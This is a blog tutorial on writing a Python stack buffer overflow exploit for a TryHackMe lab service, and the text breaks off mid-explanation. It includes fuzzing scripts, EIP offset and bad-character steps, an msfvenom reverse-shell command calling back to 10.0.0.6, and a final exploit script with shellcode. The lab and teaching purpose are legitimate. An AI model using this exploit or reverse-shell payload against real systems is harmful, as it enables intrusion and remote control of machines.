DEV Community: Biscotti Diskette The latest articles on DEV Community by Biscotti Diskette (@biscottidiskette). https://dev.to/biscottidiskette https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3603777%2Fc70dad90-0855-4583-a1d9-032f6f1a51f5.png DEV Community: Biscotti Diskette https://dev.to/biscottidiskette en Python For Exploit Development Biscotti Diskette Sun, 16 Nov 2025 10:16:19 +0000 https://dev.to/biscottidiskette/python-for-exploit-development-2971 https://dev.to/biscottidiskette/python-for-exploit-development-2971 <p><em>Originally posted on my security blog - <a href="https://biscottidiskette.github.io/" rel="noopener noreferrer">https://biscottidiskette.github.io</a></em></p> <blockquote> <p><strong>Disclaimer:</strong> For educational purposes only. Only run these techniques against machines you own or have explicit written permission to test. Unauthorized exploitation is illegal and unethical.</p> </blockquote> <h2> What We're Building </h2> <p>By the end of this post, you'll have a working buffer overflow exploit for a vulnerable Windows service. We'll cover:</p> <ul> <li>Connecting to the service with Python</li> <li>Fuzzing to find the crash</li> <li>Controlling the instruction pointer (EIP)</li> <li>Finding bad characters</li> <li>Generating and delivering shellcode</li> </ul> <p>The target is OVERFLOW1 from TryHackMe's Buffer Overflow Prep room, but the techniques work for any vanilla stack overflow.</p> <h2> Why Another Buffer Overflow Tutorial? </h2> <p>Fair question - there are plenty of buffer overflow tutorials out there. This post focuses on the <strong>why</strong> behind the code: the libraries I use, why I chose them, and how they work together to build reliable exploits.</p> <p>Most tutorials give you working code. This one explains the thinking process.</p> <p>Grab your favorite snack and water (hydration is important), and let's get cracking.</p> <h2> The Libraries </h2> <p>For vanilla buffer overflows, I typically use two libraries:</p> <p><strong>Socket</strong> - Handles TCP connections to vulnerable services. For web applications, I use <code>requests</code> for HTTP/HTTPS, but most binary exploits need raw socket programming.</p> <p><strong>Struct</strong> - Specifically the <code>pack</code> function, which handles converting memory addresses to the correct byte order for the target architecture (little-endian, big-endian). Without it, you'll manually reverse bytes. Not fun.</p> <h2> Before We Start: Three Hard-Learned Lessons </h2> <p><strong>1. Write exploits in small chunks</strong></p> <p>I understand the urge to write everything in one all-night coding session. But the first time you debug that monster at 2am, you'll understand why incremental development matters.</p> <p><strong>2. Never leave code in a broken state</strong></p> <p>Either fix it or rollback to the last working version. I've lost count of how many times I've started a session with broken code and couldn't remember what I was trying to do.</p> <p><strong>3. Save versions as you go</strong></p> <p>I use hexadecimal naming: <code>exploit_0x00.py</code>, <code>exploit_0x01.py</code>, <code>exploit_0x02.py</code>. When (not if) you break something, you can revert to the previous version instead of debugging from memory.</p> <h2> Step 1: The Initial Connection </h2> <p>First, we need to connect to the vulnerable service - regular connection, no exploitation yet.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="c1"># Connect to the service </span><span class="nf">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">))</span> <span class="c1"># Print the banner </span> <span class="n">s</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 aaaa</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="c1"># Send our command </span><span class="nf">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">))</span> <span class="c1"># Receive response </span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="c1"># Clean up </span></code></pre> </div> <p><strong>Key points:</strong></p> <ul> <li> <code>socket.AF_INET</code> = IPv4 addresses</li> <li> <code>socket.SOCK_STREAM</code> = TCP (vs UDP's SOCK_DGRAM)</li> <li> <code>connect()</code> takes a tuple - note the double parentheses</li> <li> <code>b''</code> prefix required in Python 3 (sockets use bytes, not strings)</li> <li> <code>\r\n</code> = CRLF (carriage return + newline, like pressing Enter)</li> </ul> <h2> Step 2: Fuzzing For The Crash </h2> <p>Now we'll find where the program breaks by sending increasingly large payloads.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="n">buffers</span> <span class="o">=</span> <span class="p">[</span><span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span><span class="p">]</span> <span class="n">counter</span> <span class="o">=</span> <span class="mi">100</span> <span class="k">while</span> <span class="nf">len</span><span class="p">(</span><span class="n">buffers</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">50</span><span class="p">:</span> <span class="n">buffers</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="n">counter</span><span class="p">)</span> <span class="n">counter</span> <span class="o">+=</span> <span class="mi">100</span> <span class="k">for</span> <span class="n">inputBuffer</span> <span class="ow">in</span> <span class="n">buffers</span><span class="p">:</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending: {size}</span><span class="sh">'</span><span class="p">.</span><span class="nf">format</span><span class="p">(</span><span class="n">size</span><span class="o">=</span><span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">)))</span> <span class="n">s</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p>When the program hangs, the last number printed is your crash point.</p> <h2> Step 3: Hardcode The Breakpoint </h2> <p>Take that crash point and hardcode it. Remove the loops and send a fixed-size buffer.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">2400</span> <span class="c1"># Hardcoded breakpoint </span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p>Run it again and verify EIP shows <code>0x41414141</code> (four A's in hex).</p> <h2> Step 4: Find The EIP Offset </h2> <p>We need to know exactly where in our payload EIP sits. Generate a unique pattern using Metasploit's pattern_create:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>msf-pattern_create <span class="nt">-l</span> 2400 </code></pre> </div> <p>Replace your A's with this pattern:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">Aa0Aa1Aa2Aa3...</span><span class="sh">'</span> <span class="c1"># Unique pattern from pattern_create </span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <h2> Step 5: Calculate The Offset </h2> <p>Check what's in EIP after the crash, then use pattern_offset:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>msf-pattern_offset <span class="nt">-l</span> 2400 <span class="nt">-q</span> 6f43396e <span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 1978 </code></pre> </div> <p>Now structure your payload in three parts:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">1978</span> <span class="c1"># Filler to reach EIP </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="c1"># EIP control (should show 0x42424242) </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">C</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2400</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">))</span> <span class="c1"># Padding </span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <h2> Step 6: Find Bad Characters </h2> <p>Create a byte array with all possible hex values (except <code>\x00</code>, which always terminates strings):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">badchars</span> <span class="o">=</span> <span class="p">(</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0</span><span class="sh">"</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff</span><span class="sh">"</span> <span class="p">)</span> </code></pre> </div> <p>Add it after your EIP control:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="c1"># Bad chars found so far: \x00 </span> <span class="n">badchars</span> <span class="o">=</span> <span class="p">(</span> <span class="c1"># ... full badchars array ... ) </span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">1978</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="n">badchars</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">C</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2400</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">))</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p>Check the ESP register. If you see mangled bytes or gaps, remove that byte from badchars and run again. Repeat until the entire string appears intact.</p> <h2> Step 7: Prepare For Shellcode </h2> <p>Clean up the badchars test and add a payload placeholder:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="c1"># Bad chars: \x00\x07\x2e\xa0 </span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">D</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">400</span> <span class="c1"># Placeholder for shellcode </span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">1978</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="n">payload</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">C</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2400</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">))</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <h2> Step 8: Find JMP ESP Address </h2> <p>Use a debugger (WinDBG with narly extension, Immunity Debugger with mona.py, or similar) to find a <code>JMP ESP</code> instruction in a module without memory protections.</p> <p>Search for the opcode <code>FFE4</code> (JMP ESP in x86). Once you have the address, use struct.pack to format it correctly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="kn">from</span> <span class="n">struct</span> <span class="kn">import</span> <span class="n">pack</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="c1"># Bad chars: \x00\x07\x2e\xa0 </span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">D</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">400</span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">1978</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="nf">pack</span><span class="p">(</span><span class="sh">'</span><span class="s">&lt;L</span><span class="sh">'</span><span class="p">,</span> <span class="p">(</span><span class="mh">0x625011af</span><span class="p">))</span> <span class="c1"># JMP ESP address in little-endian </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="n">payload</span> <span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">C</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2400</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">))</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p><strong>Why pack?</strong> The <code>pack('&lt;L', address)</code> converts your address to little-endian format (x86 architecture). <code>&lt;L</code> means "little-endian, unsigned long (4 bytes)."</p> <h2> Step 9: Generate And Deliver Shellcode </h2> <p>Use msfvenom to generate shellcode, excluding all bad characters:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="se">\</span> <span class="nv">LHOST</span><span class="o">=</span>10.0.0.6 <span class="se">\</span> <span class="nv">LPORT</span><span class="o">=</span>443 <span class="se">\</span> <span class="nv">ExitFunc</span><span class="o">=</span>thread <span class="se">\</span> <span class="nt">-f</span> python <span class="se">\</span> <span class="nt">-b</span> <span class="s1">'\x00\x07\x2e\xa0'</span> <span class="se">\</span> <span class="nt">-v</span> payload </code></pre> </div> <p>Replace the payload placeholder with the generated shellcode and add a NOP sled:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="kn">from</span> <span class="n">struct</span> <span class="kn">import</span> <span class="n">pack</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">10.0.0.7</span><span class="sh">'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span> <span class="c1"># Bad chars: \x00\x07\x2e\xa0 </span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span> <span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xda\xc1\xba\x6e\x21\x5d\x96\xd9\x74\x24\xf4\x5e</span><span class="sh">"</span> <span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x29\xc9\xb1\x52\x31\x56\x12\x03\x56\x12\x83\xc4</span><span class="sh">"</span> <span class="c1"># ... rest of msfvenom output ... </span> <span class="n">inputBuffer</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">1978</span> <span class="c1"># Filler to EIP </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="nf">pack</span><span class="p">(</span><span class="sh">'</span><span class="s">&lt;L</span><span class="sh">'</span><span class="p">,</span> <span class="p">(</span><span class="mh">0x625011af</span><span class="p">))</span> <span class="c1"># JMP ESP </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x90</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">16</span> <span class="c1"># NOP sled </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="n">payload</span> <span class="c1"># Shellcode </span><span class="n">inputBuffer</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">C</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2400</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">inputBuffer</span><span class="p">))</span> <span class="c1"># Padding </span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="n">url</span><span class="p">,</span><span class="n">port</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[*] Sending payload</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">sendall</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">OVERFLOW1 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">inputBuffer</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\r\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> </code></pre> </div> <p><strong>Why the NOP sled?</strong> The NOP sled (<code>\x90</code> bytes) gives the shellcode decoder 